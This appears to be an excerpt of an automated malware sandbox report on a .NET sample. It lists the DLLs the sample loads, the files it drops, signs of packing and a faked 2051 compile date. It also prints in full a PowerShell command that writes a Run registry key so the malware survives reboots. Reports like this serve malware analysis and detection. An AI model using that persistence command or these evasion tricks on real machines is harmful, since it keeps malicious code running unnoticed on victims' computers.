Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 57lklPjdPc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 57lklPjdPc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 57lklPjdPc.exe, Token.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 57lklPjdPc.exe.0.dr, Token.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 57lklPjdPc.exe, InfoBaseConnector.cs	.Net Code: AssetEvent System.AppDomain.Load(byte[])
Source: 57lklPjdPc.exe.0.dr, InfoBaseConnector.cs	.Net Code: AssetEvent System.AppDomain.Load(byte[])

Suspicious powershell command line found

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'			Jump to behavior

Source: 57lklPjdPc.exe

Static PE information: 0x9944C62E [Mon Jun 26 19:40:30 2051 UTC]

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_016F4B00 push eax; retf	0_2_016F4B01
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Code function: 0_2_016F1214 push 8BFFFFFEh; retf	0_2_016F121C
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 4_2_02FE55A4 push eax; ret	4_2_02FE55AD
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Code function: 5_2_015055A4 push eax; ret	5_2_015055AD

Source: 57lklPjdPc.exe	Static PE information: section name: .text entropy: 7.870067595402444
Source: 57lklPjdPc.exe.0.dr	Static PE information: section name: .text entropy: 7.870067595402444
Source: l6E.exe.0.dr	Static PE information: section name: .text entropy: 7.99531886540761

Source: C:\Users\user\Desktop\57lklPjdPc.exe	File created: C:\Users\user\AppData\Roaming\57lklPjdPc.exe			Jump to dropped file
Source: C:\Users\user\Desktop\57lklPjdPc.exe	File created: C:\Users\user\AppData\Roaming\l6E.exe			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57lklPjdPc			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57lklPjdPc			Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\D1B229C21A0A68AF7DA7312615A134A4 93b21885452761d5418e7b08ca003661

Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
